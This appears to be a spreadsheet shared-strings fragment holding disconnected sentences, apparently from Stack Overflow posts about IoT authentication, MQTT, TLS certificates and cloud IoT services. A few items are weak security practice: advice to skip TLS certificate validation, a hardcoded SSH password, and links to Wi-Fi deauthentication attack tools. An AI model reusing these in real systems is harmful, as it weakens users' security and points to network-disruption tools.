    <t>The bluetooth aspect of negotiating the connection is meant to be transparent to the Arduino.</t>
  </si>
  <si>
    <t>a password) to each client of this API, and then require that this key is provided by the client with all requests sent to the server.</t>
  </si>
  <si>
    <t>Bus 001 Device 004: ID 0a5c:21e8 Broadcom Corp. 
cd /sys/bus/usb/devices/
grep -i -s -r 0a5c *
1-1.2/idVendor:0a5c
cd 1-1.2
echo 0 &gt; authorized
echo 1 &gt; authorized</t>
  </si>
  <si>
    <t>You can see this Authenticate used in the samples provided on that GitHub page.</t>
  </si>
  <si>
    <t>Sign your request with  instead if iot
example:</t>
  </si>
  <si>
    <t>it might be that you've run into a https/http security problem with the viewer.</t>
  </si>
  <si>
    <t>As for the security aspect of your question, a field/protocol gateway can be either transparent or opaque.</t>
  </si>
  <si>
    <t>All client devices needs to have unique client ids.</t>
  </si>
  <si>
    <t>correct Policies and permissions attached.</t>
  </si>
  <si>
    <t>When a client connected to broker it has a unique client ID.</t>
  </si>
  <si>
    <t>This api can associate principal (such as a certificate or other credential) with device created in the registry.</t>
  </si>
  <si>
    <t>Then you would have to transfer that token to the IoT device.</t>
  </si>
  <si>
    <t>If you have the certificate ARN, you can lookup the policy attached to this certificate using the  call.</t>
  </si>
  <si>
    <t>(2) If you need SSL then you MUST load up your certs using the firmware updater
 first.</t>
  </si>
  <si>
    <t>CA certificate
CA key
or
CA Certificate
Client certificate verificated CN 
Client key
(And with which extension??)</t>
  </si>
  <si>
    <t>This command will return the policies attached to the certificate.</t>
  </si>
  <si>
    <t>MQTT is not HTTP, it can not use a HTTP proxy.</t>
  </si>
  <si>
    <t>Also, use /etc/letsencrypt/live/site1/fullchain.pem .</t>
  </si>
  <si>
    <t>Your application must use OAuth 2.0 to authorize requests.</t>
  </si>
  <si>
    <t xml:space="preserve">
don't user the certificate that you are trying for connecting the Iot Device , use can use 'MQTT over the WebSocket Protocol' or 
https://github.com/aws/aws-iot-device-sdk-js/issues/86#issuecomment-371159865</t>
  </si>
  <si>
    <t>pool = fabric.group.SerialGroup("pi@192.168.3.151", "pi@192.168.3.123", 
                                  port=22, connect_kwargs={"password": "Raspberry"})
Documentation: http://docs.fabfile.org/en/2.4/api/group.html#fabric.group.SerialGroup</t>
  </si>
  <si>
    <t>It wouldn't be able to respond to HTTPS requests because HTTPS uses port 443.</t>
  </si>
  <si>
    <t>When you use MQTT to connect the Azure IoT Hub directly, you need to connect over TLS/SSL.</t>
  </si>
  <si>
    <t>I wasn't trying to connect to AWS (but rather my own TLS secured MQTT Broker)  and I had exactly the same error message.</t>
  </si>
  <si>
    <t>TDE, or Transparent Data Encryption, is used by Microsoft and Oracle to encrypt database content.</t>
  </si>
  <si>
    <t>Any actions not allowed by the security policy cause a SecurityException to be thrown.</t>
  </si>
  <si>
    <t>The Cryptographic Message Syntax (CMS) is the IETF's standard for cryptographically protected messages.</t>
  </si>
  <si>
    <t>As of API level 23 permissions need to be requested at runtime.</t>
  </si>
  <si>
    <t>This technique can be useful when using SSL/TLS with wildcard certificates.</t>
  </si>
  <si>
    <t>Inside it uses:
CFNetwork for HTTP/HTTPS connections.</t>
  </si>
  <si>
    <t>Access social network APIs using authenticated requests.</t>
  </si>
  <si>
    <t>Specifies how data is protected when transported between a client and a server.</t>
  </si>
  <si>
    <t>However, if the user is authenticated, the middleware will allow the request to proceed further into the application.</t>
  </si>
  <si>
    <t>Requests to ClientLogin will fail with
  a HTTP 404 response.</t>
  </si>
  <si>
    <t>ssl: { // Optional SSL proxying.</t>
  </si>
  <si>
    <t>AuthzForce project: https://github.com/authzforce</t>
  </si>
  <si>
    <t>What's bothering me is what if another message comes while I am working on this one (Unsolicited message info).</t>
  </si>
  <si>
    <t>Could someone let me know whether the Azure IoT Java Service SDK has capability to register a device which authenticates using X.509 certificates?</t>
  </si>
  <si>
    <t>I am trying to register a fake device with Azure IoT DPS.</t>
  </si>
  <si>
    <t>What you're sending back is not a valid HTTP response but just some protocol agnostic HTML snippet.</t>
  </si>
  <si>
    <t>As shown here, 
please include the intermediate certificate as well in the certificate chain presented by the device.</t>
  </si>
  <si>
    <t>4) Associate the certificate created above with device created in the registry so that it can be authenticated when it connects.</t>
  </si>
  <si>
    <t>I think when the payload is invalid, a message should be logged to cloudwatch that the payload is invalid.</t>
  </si>
  <si>
    <t>This is a tutorial for generating an SSL certificate using docker only: https://codefresh.io/blog/using-docker-generate-ssl-certificates/
Once you have a certificate, you have to deploy it in your docker app stack, but I guess this is off-topic for your question.</t>
  </si>
  <si>
    <t>It not an HTTP server, and therefore requires a front-end server to proxy requests.</t>
  </si>
  <si>
    <t>On one Arduino I have a security sensor shield with two PIRs attached and publishing states to the broker (this works 100% how it should).</t>
  </si>
  <si>
    <t>After creating a new Service bus and event hub in new portal I can register my devices.</t>
  </si>
  <si>
    <t>Currently the two solutions I'm thinking are :
Using a TLS/SSL wrappers for socket objects and end to end encryption.</t>
  </si>
  <si>
    <t>It's a bit of a headache for me at the moment, but I suppose it's good that they're pretty much forcing a transition to relatively secure end-to-end systems for IoT edge node devices.</t>
  </si>
  <si>
    <t>Belief propagation algorithm works by passing real valued functions called messages along the edges between the hidden nodes.</t>
  </si>
  <si>
    <t>Then, I created an authorizer for API number 1 with the same user pool and enabled authorization in POST method execution for it.</t>
  </si>
  <si>
    <t>After that I generated an SAS token in Azure (Storage Accounts -&gt; -&gt; Shared Access Signature) and plugged that in into my connection string.</t>
  </si>
  <si>
    <t xml:space="preserve">
I generated an SAS token in Azure (Storage Accounts -&gt; -&gt; Shared Access Signature) and plugged that in into my connection string.</t>
  </si>
  <si>
    <t>Access token persistence and signing of API calls are handled automatically by the Client-side JavaScript SDK, iOS SDK and Android SDK.</t>
  </si>
  <si>
    <t>Make sure the value of Authorization header is formed correctly including the signature.&lt;/HttpStatusMessage&gt;\r\n  &lt;TargetLocation&gt;Primary&lt;/TargetLocation&gt;\r\n  &lt;ServiceRequestID&gt;c4892c5a-0002-003a-4992-493991000000&lt;/ServiceRequestID&gt;\r\n  &lt;ContentMd5 /&gt;\r\n  &lt;Etag /&gt;\r\n  &lt;RequestDate&gt;Wed, 06 Jan 2016 22:30:01 GMT&lt;/RequestDate&gt;\r\n  &lt;StartTime&gt;Wed, 06 Jan 2016 21:29:55 GMT&lt;/StartTime&gt;\r\n  &lt;EndTime&gt;Wed, 06 Jan 2016 21:32:12 GMT&lt;/EndTime&gt;\r\n  &lt;Error&gt;\r\n    &lt;Code&gt;AuthenticationFailed&lt;/Code&gt;\r\n    &lt;Message&gt;Server failed to authenticate the request.</t>
  </si>
  <si>
    <t>These are requirements:
Speed (I publish something and many pis receive message at the same time)
Unlimited subscriptions (I want up to 50 pi's in network)
The Idea is to create decentralized network.</t>
  </si>
  <si>
    <t>request.js:150 OPTIONS
  https://pysensors.azure-devices.net/statistics/devices?api-version=2018-06-30
  net::ERR_SPDY_INADEQUATE_TRANSPORT_SECURITY
I don't know if I have to configure something to make it works on all the recent versions of the browsers.</t>
  </si>
  <si>
    <t>The EASY way to do it is for sure to simply pass the deviceID as an added value in the telemetry blob, and is how I do it (mostly because I don't want to mess with other APIs) and I don't have network size concerns for most of what I do.</t>
  </si>
  <si>
    <t>I have a Linux server running a public-facing SSL-protected Apache instance, and if need be, I could (well, with help) configure it to allow the request to be made over SSL on the Internet and then forwarded to the webcam on the LAN.</t>
  </si>
  <si>
    <t>I have already checked the following pages for help:
Sending notifications to Google Cloud Messaging with php gives me Unauthorized Error 401
http://fryerblog.com/post/30057483199/implementing-push-notifications-with-gcm
Any help is appreciated!</t>
  </si>
  <si>
    <t>To make matters worse, I can:
Publish messages from the raspberry pi and receive them on my laptop(osx)
A REQ/REP model works in both directions (osx -&gt; RPI and RPI -&gt; osx)
I was thinking that it has something to do with the firewall on either device, which I disabled on both.</t>
  </si>
  <si>
    <t>displaying these messages from the on_log an on_message functions:
However, as soon as I add the authentication plugin to the broker it then gives me these messages:
to my understanding, result code 5 means refused due to not being authorised.</t>
  </si>
  <si>
    <t>When I do the same with a basic ASP.NET Core app I get the following error :
Unhandled Exception: System.IO.FileLoadException: Could not load file
  or assembly 'System.Component.Primitives, Version=4.2.0.0,
  Cultire=Neutral, PublicKeyToken=b03f5f7f11d50a3a'.</t>
  </si>
  <si>
    <t>The solution need to keep keep geo-replicated backups of device identities from primary, and upload them to the secondary IoT hub before switching the active endpoint for the devices.</t>
  </si>
  <si>
    <t>When i am trying to login from ios client (ios-web-agent/enrollemnt/ios/login),I got the following error
HTTP Status : 500 
{/app/modules/oauth/token-handlers.js} Could not set up token pair by password grant type.</t>
  </si>
  <si>
    <t>Before I made the changes to main.cf regarding:
smtpd_relay_restrictions =
  # subject even authenticated users and trusted networks
  # to the policy check
  check_policy_service inet:127.0.0.1:10031
  permit_mynetworks
  reject_unknown_sender_domain
  permit_sasl_authenticated
  defer_unauth_destination
smtpd_recipient_restrictions =
  permit_mynetworks
  permit_sasl_authenticated
  # we exclude our networks and SASL authenticated users
  # from all further checks.</t>
  </si>
  <si>
    <t>So my solution currently is:
Set up auto login
I created a  file with the content
This is got from https://wiki.gentoo.org/wiki/Automatic_login_to_virtual_console
Start script at login 
Add at the end of the .bashrc the startup of my python script</t>
  </si>
  <si>
    <t>You also mentioned you are using a free account - if you are sure you have the correct key, is there a chance your free trial has expired or exceeded the quota of 8,000 messages per day - see the pricing calculator.</t>
  </si>
  <si>
    <t>5. start the ./iot-server.sh start 
6. open https://exemple.com:9443/devicemgt portal 
7. enter the admin user account and get the error as shows below: 
TID: [-1234] [] [2018-09-02 16:58:34,021] ERROR {auth-module} -  An exception thrown when executing the script '/app/modules/login.js'.</t>
  </si>
  <si>
    <t>When a new non-classified sample is given, the algorithm finds the k-nearest neighbors to the new sample, and determines what should its classification be, according to the classification of the classified samples, which were given as training set.</t>
  </si>
  <si>
    <t>The Silent Post URL is a function offered by Authorize.Net that is similar in purpose to Paypal's Instant Payment Notification.</t>
  </si>
  <si>
    <t>You can simulate the open-with flow of a Drive file with the OAuth 2.0 playground, and then finish the OAuth 2.0 flow with the playground and play HTTP requests to the Drive REST API.</t>
  </si>
  <si>
    <t>The algorithm avoids deadlock by denying or postponing the request if it determines that accepting the request could put the system in an unsafe state (one where deadlock could occur).</t>
  </si>
  <si>
    <t>And programs can be attached to a variety of hooks in the kernel, for networking (sockets, as before, but also TC (traffic control) interface, XDP), for security (cgroups) or for tracing and monitoring the kernel (kprobes, tracepoints, ).</t>
  </si>
  <si>
    <t>Azure Stack can enable new scenarios for your modern applications, such as edge and disconnected environments, or meet specific security and compliance requirements.</t>
  </si>
  <si>
    <t>Authorize.Net claims a user base of over 350,000 merchants, which would make them the Internet's largest payment gateway service provider.</t>
  </si>
  <si>
    <t>A class in the System.Web namespace of the .NET framework which provides a type-safe way to create and manipulate individual HTTP cookies.</t>
  </si>
  <si>
    <t>A tcp server is implemented on the arduino using EthernetServer(port), a connection is accepted using 
However, as far as I understand the source of available correctly, it returns a valid client only when there is something to read from this client object.</t>
  </si>
  <si>
    <t>I followed this guide here: http://www.element14.com/community/message/139528/l/re-piface-digital-2--setup-and-use#139528
And afterwards the permissions were correct (even for the pin-folders and their files value, direction, ...).</t>
  </si>
  <si>
    <t>i have a mqtt broker running on my PC, to which i am trying to bridge with aws iot thing.i followed this link HOW TO BRIDGE BETWEEN MOSQUITTO MQTT AND AWS IOT MQTT BROKER (TO PUBLISH OPENHAB SMARTHOME DATA TO THE CLOUD)i updated the .conf file as per my iot end point and respective certificate file , private key and root CA file.but when i tried to run the mosquitto.conf file , socket error occurs.</t>
  </si>
  <si>
    <t>I have the following simple code written in java-ME embedded:       
}
The previous code run just fine (My LED is turned ON and OFF) until the execution reach this statement:  
The following exception occurs:  
TRACE: &lt;at java.security.AccessControlException: &gt;, startApp threw an Exception java.security.AccessControlException: 
My API permissions Configuration:
Can any one please tell me why this exception occurs?</t>
  </si>
  <si>
    <t>The error message is:
AmqpException:
  {"errorCode":401002,"trackingId":"e930cb7c-d1a5-4ad0-bb5d-e9b4ee97e8b2","message":"IotHubUnauthorizedAccess","timestampUtc":"2018-10-12T18:08:23.2328669Z"}
edit: Working certificate
The one created with C#:
X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            X509v3 Key Usage:
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Server Authentication, Time Stamping
            X509v3 Subject Key Identifier:
                00:5E:F2:48:5C:E4:CA:B5:F3:5F:A6:0E:62:7C:FF:61:87:B1:D5:89</t>
  </si>
  <si>
    <t>I'm trying to provision devices through AWS IOT api calls, i have used the AWS CLI to get CA Certificate and i have also generated X.509 certificate.</t>
  </si>
  <si>
    <t>So how to covert the iot rules timestamp to redshift timestamp?</t>
  </si>
  <si>
    <t>I want to use a SAS-token to connect with expiration, instead of connecting with the symmetric key of the device.</t>
  </si>
  <si>
    <t>Then i publish the decrypted information to the MQTT broker again.</t>
  </si>
  <si>
    <t>Using openssI I created root and leaf certificates.</t>
  </si>
  <si>
    <t>I uploaded this certificate to the azure DPS.</t>
  </si>
  <si>
    <t>After adding necessary publish permissions to my policy.</t>
  </si>
  <si>
    <t>Use a token in headers between all you apps.</t>
  </si>
  <si>
    <t>Redmine tells me also that I could use http and https checkouts, but a netstat reveals that there is no server listening on 443.</t>
  </si>
  <si>
    <t>In doing to I am not sure as how to protect arduino from unauthorized requests from web.</t>
  </si>
  <si>
    <t>none of the other clients see the message until the enter key is pressed.</t>
  </si>
  <si>
    <t>client errorError: Connection refused: Not authorized
Can anyone help on this please.</t>
  </si>
  <si>
    <t>When verifying the code I get the error message -
'analogread' was not declared in this scope.</t>
  </si>
  <si>
    <t>When I login to my raspberry pi using ssh, the pi is working well, but it always shows messages as below:
when login,
Could anyone tell me on how to get rid of these messages?.</t>
  </si>
  <si>
    <t>For more information please deserialize this message via RequestResult.TranslateFromExceptionMessage.--&gt;\r\n&lt;RequestResult&gt;\r\n  &lt;HTTPStatusCode&gt;403&lt;/HTTPStatusCode&gt;\r\n  &lt;HttpStatusMessage&gt;Server failed to authenticate the request.</t>
  </si>
  <si>
    <t>I have secret key and access key that are required to publish data to IoT.</t>
  </si>
  <si>
    <t>But I am not able to figure out how to redirect https requests with dnsmasq.</t>
  </si>
  <si>
    <t>I am using java client SDK given by microsoft azure to connect but my connection is not authorized.</t>
  </si>
  <si>
    <t>I don't understand why it's working with ssh and not via the http POST.</t>
  </si>
  <si>
    <t>My UWP code works like this:
Check app cert store for client cert and CA cert installed.</t>
  </si>
  <si>
    <t>I tried to implement TrustZone with github.com/songwenbin247/TrustMe on github but I'm blocked on the 2.d.</t>
  </si>
  <si>
    <t>I know we can send heartbeat payload through device monitoring topic.</t>
  </si>
  <si>
    <t>How can I send an HTTP request to a device whose IP address is not known?</t>
  </si>
  <si>
    <t>I have 1 project with token and one ESP8266 board with this token.</t>
  </si>
  <si>
    <t>If I comment out the Authorization header, I get a 401, which is unauthorized access.</t>
  </si>
  <si>
    <t>This value is used to distinguish devices with the same deviceId, when they have been deleted and re-created.</t>
  </si>
  <si>
    <t>Should I get my server's fingerprint over HTTP from another endpoint and then use HTTPS?</t>
  </si>
  <si>
    <t>I feel like the server should at least respond with an unauthorized request.</t>
  </si>
  <si>
    <t>And it works OK. so I want to know: in azure iot sdk how can I pass these 2 options(Username and Password)?</t>
  </si>
  <si>
    <t>But still, before that, the IOTHUB_CLIENT_CONFIRMATION_OK ack arrived soon after the messages were sent on the device, despite the delayed messages in iothub-explorer.</t>
  </si>
  <si>
    <t>Since the docs say valid codes are -1 and HTTP codes, how can I find out what is -114?</t>
  </si>
  <si>
    <t>Also what is the standard for authenticating users in regions without cognito ?</t>
  </si>
  <si>
    <t>In my function I am trying to get the DeviceId so that I can verify the device that the message came from.</t>
  </si>
  <si>
    <t>Do I need to have an explicit policy in Amazon Cognito identity pool for IoT Access, or is that linkage done specifically through AttachPrincipalPolicy?</t>
  </si>
  <si>
    <t>I use the master branch of this link: https://github.com/esp8266/Arduino for my secure SSL connection.</t>
  </si>
  <si>
    <t>authenticated users have full access to all AWS services i'm using.</t>
  </si>
  <si>
    <t>The device is not behind firewall or any special network topology used, it connects to the IoT Hub via MQTT.</t>
  </si>
  <si>
    <t>"Resource": [
    "arn:aws:iot: ${region}:${accountId}:client/${certificateId},
    "arn:aws:iot: :${region}:${accountId}:client/${iot:ClientId}"
  ]
}
This way is enough Secure?</t>
  </si>
  <si>
    <t>I've been trying to restrict /Receive permissions to a IoT topics to a user's Cognito ID.</t>
  </si>
  <si>
    <t>However, Azure is not detecting any messages being sent by the device.</t>
  </si>
  <si>
    <t>How do I sign a user out so they cannot get credentials and connect to IoT with these tokens?</t>
  </si>
  <si>
    <t>I exported the key and certificate with OpenSSL and used them to feed the Python socket SSL wrapper.</t>
  </si>
  <si>
    <t>In the below C# code:
we need to input resourceUri which I believe is &lt;somename&gt;.azure-devices.net, keyname is the policyname and key can be used as primary or secondary key.</t>
  </si>
  <si>
    <t>I want to log the id from the body object in the console.</t>
  </si>
  <si>
    <t>However, those devices cannot be enrolled automatically via Azure DPS.</t>
  </si>
  <si>
    <t>However, no messages come through when I attempt to monitor D2C messages.</t>
  </si>
  <si>
    <t>basically, my ARDUINO will act as a transparent gateway.</t>
  </si>
  <si>
    <t>I understand Aws IoT from a device perspective that it should connect with a certificate and sync with its shadow and push messages to topics.</t>
  </si>
  <si>
    <t>I have a sketch that requests a device token from Facebook in order to authenticate a Wemos D1 Mini.</t>
  </si>
  <si>
    <t>It should be mostly straightforward, however, inserting the Edge Hub certificate is the trickiest part.</t>
  </si>
  <si>
    <t>The input to the sample app is the Id scope of device provisioning service and the certificate.</t>
  </si>
  <si>
    <t>I have found that I can connect to it using TLS, but it fails to connect when I have it verify the broker with the certificate provided.</t>
  </si>
  <si>
    <t>auth code URL is 'https://github.com/login?return_to=%2Flogin%2Foauth%2Fauthorize%3Fclient_id%3D5cc655ef49c97302664e' and
execution command is './aircon_controlee 127.0.0.1:5683 github 8f7174caa697d7914312' (in same network).</t>
  </si>
  <si>
    <t>Is there a way to make https requests in Lua?</t>
  </si>
  <si>
    <t>I'm currently working with the excellent hoverboard-firmware-hack source code on GitHub, and it's really great.</t>
  </si>
  <si>
    <t>Maybe Android needs for the LAN another permission as "INTERNET"
c. http/https problem?</t>
  </si>
  <si>
    <t>Also I dont see any message or log, which says the request are throttled.</t>
  </si>
  <si>
    <t>I want to be able to resume a previous connection without the need to resend all certificates (sparing data and battery).</t>
  </si>
  <si>
    <t>It throws an exception that the connection cannot be established.</t>
  </si>
  <si>
    <t>From wireshark we are certain that client sends "Hello" on which Server (IOT Hub) responds "Server Hello, Certificate, Certificate Request, Server Hello Done".</t>
  </si>
  <si>
    <t>The secret key can be passed as HTTP Basic Authentication with every request.</t>
  </si>
  <si>
    <t>If you still have problems, this might be helpful, or maybe the --allow-unauthenticated flag.</t>
  </si>
  <si>
    <t xml:space="preserve">
This means that your server requested your user agent (Arduino in this case) to authenticate using basic access authentication.</t>
  </si>
  <si>
    <t>Here is an example of how to connect via python ssh script (taken from http://python-for-system-administrators.readthedocs.org/en/latest/ssh.html):</t>
  </si>
  <si>
    <t xml:space="preserve">
If someone enters in something other than an integer, it will throw an exception.</t>
  </si>
  <si>
    <t>Downgrade to sshj 0.9.0 here: http://mvnrepository.com/artifact/net.schmizz/sshj/0.9.0
The problem seems to have been introduced in 0.10.x.</t>
  </si>
  <si>
    <t>In order to access your RPi |2| client from other VPN clients (in your case its iphone), you must know the IP address of the RPi |2| client.</t>
  </si>
  <si>
    <t>If you look at the exception it clearly says it cannot identify the TLS connection certificate.</t>
  </si>
  <si>
    <t>To get some sort of authorization, you shall read the HTTP GET request, and check how it looks like.</t>
  </si>
  <si>
    <t>An Azure IoTHub can own multiple shared access policies.</t>
  </si>
  <si>
    <t>Okay, this is a little late, but anyway: from v515 upwards you can use the  command to change the authentication behaviour.</t>
  </si>
  <si>
    <t>All connections to an Azure IoT Hub must be secured.</t>
  </si>
  <si>
    <t>The string in your  variable is not a valid HTTP request.</t>
  </si>
  <si>
    <t>So from the error message I received (posted above) I realised that /dev/video0 needed permissions for other users.</t>
  </si>
  <si>
    <t>What you're experiencing is likely an issue with the server not allowing http requests because it runs https protocol.</t>
  </si>
  <si>
    <t>With the authentication + these you should be able to implement File Upload through IoT Hub.</t>
  </si>
  <si>
    <t>Moreover, it's easy-ish to provide some kind of security using SSL and HTTP authentication.</t>
  </si>
  <si>
    <t>Project links: https://github.com/spacehuhn/esp8266_deauther, https://github.com/RandDruid/esp8266-deauth.</t>
  </si>
  <si>
    <t>The Pairwise Transient Key is changed each time the Supplicant authenticates, or re-authenticates.</t>
  </si>
  <si>
    <t>If you are using HTTPS instead of HTTP without installing the certificates to the android agent (For this you will have to compile the Android agent.</t>
  </si>
  <si>
    <t>Since you're using the  library, aws-requests-auth is an attractive choice.</t>
  </si>
  <si>
    <t>In addition to this you'll also want to skip TLS cert validation when you connect to Edge Hub.</t>
  </si>
  <si>
    <t>This is because when running on your PC it is not setup to trust the server cert that Edge Hub uses.</t>
  </si>
  <si>
    <t>Once your configuration is established, your devices should use either MQTT or HTTP.</t>
  </si>
  <si>
    <t>The error message indicates that the CA's certificate is not allowed to sign other client public keys.</t>
  </si>
  <si>
    <t>As you say, that does make authentication more difficult on device because it's using a bearer token (service_account.json).</t>
  </si>
  <si>
    <t>It is on our radar the development for x509 provisioning, which requires modules/devices authentication with edge with x509, which is also under development.</t>
  </si>
  <si>
    <t>If encryption of data is needed it has to be done on the device prior to send it to Edge Hub.</t>
  </si>
  <si>
    <t>Another is that you can use the Azure Service Principal, you can set the permission for the user.</t>
  </si>
  <si>
    <t>The error implies your truststore doesn't have either the right or the full certificate chain for to authenticate the server.</t>
  </si>
  <si>
    <t>The device couldn't get the date and time automatically so there was a mismatch between this one and Azure's and that caused the authentification error.</t>
  </si>
  <si>
    <t>Configure the HTTP client to include the device client certificate.</t>
  </si>
  <si>
    <t>You can consider using symmetric key to provision via the Device Provisioning Service.</t>
  </si>
  <si>
    <t>For connection string, you can use IoT Hub Owner from shared access policies.</t>
  </si>
  <si>
    <t>ASP.NET Identity is the new membership system for building ASP.NET web applications.</t>
  </si>
  <si>
    <t>Local Security Authority is a security subsystem of Microsoft Windows used to authenticate users on the local system and maintains the security policy of the system.</t>
  </si>
  <si>
    <t>HTTPl Middleware is a mechanism for filtering HTTP requests that are passing through your application.</t>
  </si>
  <si>
    <t>This server received an invalid response from an upstream server it accessed to fulfil the request.</t>
  </si>
  <si>
    <t>Moquette aims to be a MQTT compliant broker.</t>
  </si>
  <si>
    <t>It disallows surfing the Internet, until you have authenticated or accepted ToS.</t>
  </si>
  <si>
    <t>For questions about the use of the Google OAuth Client Library for .NET.</t>
  </si>
  <si>
    <t>Use this tag for questions about challenge-response authentication.</t>
  </si>
  <si>
    <t>You can also use interceptors on the immutable response and request.</t>
  </si>
  <si>
    <t>Client connects to the proxy server, requesting some service available from different servers.</t>
  </si>
  <si>
    <t>The attack is performed using a program which appears as a service to the client and as a client to the server.</t>
  </si>
  <si>
    <t>Finally the cookie will be removed from the HTTP response.</t>
  </si>
  <si>
    <t>Related Tags
authorize.net
arb
paypal-ipn</t>
  </si>
  <si>
    <t>authz is an abbreviation of authorization, the concept of giving permission to do something on behalf of an authenticated user.</t>
  </si>
  <si>
    <t>Flask-httpauth is built on this framework and is available at https://github.com/miguelgrinberg/flask-httpauth.</t>
  </si>
  <si>
    <t>The latter is the latest version of the token, the former is used for backward compability with older servers.</t>
  </si>
  <si>
    <t>The server will read the LTPA token and after validating it accept the users authentication.</t>
  </si>
  <si>
    <t>Key management for the content can be done on Widvine platform or by the clients.</t>
  </si>
  <si>
    <t>The system returns a message identifier in the range 0xC000
through 0xFFFF when an application calls the RegisterWindowMessage
function to register a message.</t>
  </si>
  <si>
    <t>Upon login, the Message of the Day (/etc/motd) indicates whether or not any additional updates are available.</t>
  </si>
  <si>
    <t>This article, while dated, is a good primer on sspi:
Logon and Authentication Technologies</t>
  </si>
  <si>
    <t>When connecting to a room a client needs the access token that is    usually taken by server apps.</t>
  </si>
  <si>
    <t>WebScarab is able to intercept both HTTP and HTTPS communication.</t>
  </si>
  <si>
    <t>An ActiveRecord Mixin for Safe Destroys
Github repository: https://github.com/dockyard/ruby-destroyed_at</t>
  </si>
  <si>
    <t>Moquette aims to be a mqtt compliant broker.</t>
  </si>
  <si>
    <t>Used also for certificate dissemination (for instance as a response to a PKCS#10 message).</t>
  </si>
  <si>
    <t>The Negotiate HTTP authentication scheme is defined in RFC 4559.</t>
  </si>
  <si>
    <t>LoggingInterceptor - An OkHttp interceptor which pretty logs request and response data.</t>
  </si>
  <si>
    <t>It's thrown when a particular security provider is requested but is not available in the environment.</t>
  </si>
  <si>
    <t>It uses an instance of AFJSONSerialization to handle response validation and serialization.</t>
  </si>
  <si>
    <t>Scribe is a library for OAuth-signing HTTP requests.</t>
  </si>
  <si>
    <t>An application or a user, that wants to access a protected service, authenticates with Keyrock IdM and gets an OAuth2 token.</t>
  </si>
  <si>
    <t>It also supports WS-Security, which allows you to sign SOAP messages, encrypt and decrypt them, or authenticate against them.</t>
  </si>
  <si>
    <t>Note: You provide this filesystem with an authenticated DropboxJS V2 JS SDK client.</t>
  </si>
  <si>
    <t>TLS/SSL Client with support for client side authentication.</t>
  </si>
  <si>
    <t>This includes Google+ Sign-in and OAuth token requests with Google+ scopes.</t>
  </si>
  <si>
    <t>Kerberos authentication in web browsers and HTTP clients is supported via the SPNEGO mechanism (RFC 4559).</t>
  </si>
  <si>
    <t>{"25\r\nthis is the text, of this file, wooo!\r\n"=&gt;nil} Invalid
  request: Invalid HTTP format, parsing fails.</t>
  </si>
  <si>
    <t>Trust policy
Role Policy
Pl suggest how to troubleshoot.</t>
  </si>
  <si>
    <t>Using Google Cloud IoT Core to receive telemetry data from IoT Devices, what is the best way to detect when an IoT Sensor Device goes offline or becomes silent?</t>
  </si>
  <si>
    <t>e-mail) to send unsolicited bulk messages indiscriminately.</t>
  </si>
  <si>
    <t>Built-in Content Server which can deal with DRM and encrypted contents.</t>
  </si>
  <si>
    <t>And how to create a userfriendly and secured API to request realtime and bulk data?</t>
  </si>
  <si>
    <t>The code above works for APIs hosted on an insecure http site, but Strava and most other APIs nowadays force https.</t>
  </si>
  <si>
    <t>I am using NodeJS along with AWS JS SDK and AWS IoT Device JS SDK in order to automatically create a new thing and assign certificates and policies to it once it connects to my server.</t>
  </si>
  <si>
    <t>One thing to be mid-full of is that you format the datetime without any forbidden chars for the platform you are using.</t>
  </si>
  <si>
    <t>The client may repeat the request with a suitable Proxy-Authorization header field.</t>
  </si>
  <si>
    <t>JWT is the identity token format in OpenID Connect and it is also widely used in OAuth 2.0 and many other contexts that require compact message security.</t>
  </si>
  <si>
    <t>We are attaching in mail the root certificate we are adding to client and the wireshark we see stating bad certificate.</t>
  </si>
  <si>
    <t>Try this way.`
Though it doesn't remove the entire warning message, still removes the Insecure Request Warning</t>
  </si>
  <si>
    <t>jayaweera 
This is work in progress and we expect to have CA signed certs support in both the device and the service clients by the end of the month.</t>
  </si>
  <si>
    <t>SSL V3 has reached end of life and has been deprecated in favor of Transport Layer Security ([tag:TLS]).</t>
  </si>
  <si>
    <t>Typical server apps can create a room, and request access for their users to Nuve, via a token-based authentication mechanism.</t>
  </si>
  <si>
    <t>SAML 2.0 is an XML-based protocol that uses security tokens containing assertions to pass information about a principal (usually an end user) between a SAML authority, that is, an identity provider, and a SAML consumer, that is, a service provider.</t>
  </si>
  <si>
    <t>We are going to use Windows 10 IoT Enterprise or Linux (NOT Windows 10 IoT Core)
EDIT: Here https://github.com/ms-iot/security/blob/master/Limpet/Limpet.NET/Limpet.cs is the method (SignHmac) used to create a signature for a SAS Token based on the device's primary key directly in the TPM (2.0).</t>
  </si>
  <si>
    <t>If you're using  to instantiate the client object the SDK disconnects and reconnects every 45 minutes to renew the shared access signature token.</t>
  </si>
  <si>
    <t>If your question is about determining what security policy should apply or whether a system meets a desired security policy, and it doesn't involve code, consider asking on Security Stack Exchange.</t>
  </si>
  <si>
    <t>In my case the process is as follows
send the UID over bluetooth
Create custom token with the UID
Sign in with the custom token</t>
  </si>
  <si>
    <t>find the generated authenticated authorization code file in the folder prompted in the console and continue in the original documentation steps</t>
  </si>
  <si>
    <t>Special characters that appear in addresses, headers or message contents must be encoded using a "%" followed by a two-digit hex number.</t>
  </si>
  <si>
    <t>When I cancel the run (ctrl+c), I get a long traceback, ending with:
File "/usr/lib/python2.7/ssl.py", line 305, in do_handshake
  self._sslobj.do_handshake()
I don't have any issues opening https://www.mint.com, so it seems that the issue is the login.event, which is necessary in order to submit the login credentials.</t>
  </si>
  <si>
    <t>A server sets a cookie using  HTTP header:
It is possible to set cookies also on image and similar content that makes them a powerful tracking tool.</t>
  </si>
  <si>
    <t>GS1 page specially talking about 2D barcode (like datamatrix):
https://www.gs1.org/barcodes/2d
Full GS1 standard can be found here and is still evolving:
https://www.gs1.org/standards/barcodes-epcrfid-id-keys/gs1-general-specifications</t>
  </si>
  <si>
    <t>The warning message implies this is something related to group policy settings, but I don't think it's worth any effort to hack the group policy, since your Windows 10 can not run as headless-mode.</t>
  </si>
  <si>
    <t>In fact the security mechanism of MQTT is not well established in M2M communication whereas websockets follow http security mechanisms (TLS ecnryption)
Update:
I used a misleading sentence not well established.</t>
  </si>
  <si>
    <t>If you register a device with id myDevice of a device type with id myType, and set it's auth token to myToken then you would form the connection as below:
window.client = new Paho.MQTT.Client("bmzc5i.messaging.internetofthings.ibmcloud.com", 8883, 'd:bmzc5i:myType:myDevice');
      window.client.connect({
            onSuccess: onConnectSuccess,
            onFailure: onConnectFailure,
            userName: "use-token-auth",
            password: "myToken",
            useSSL: true
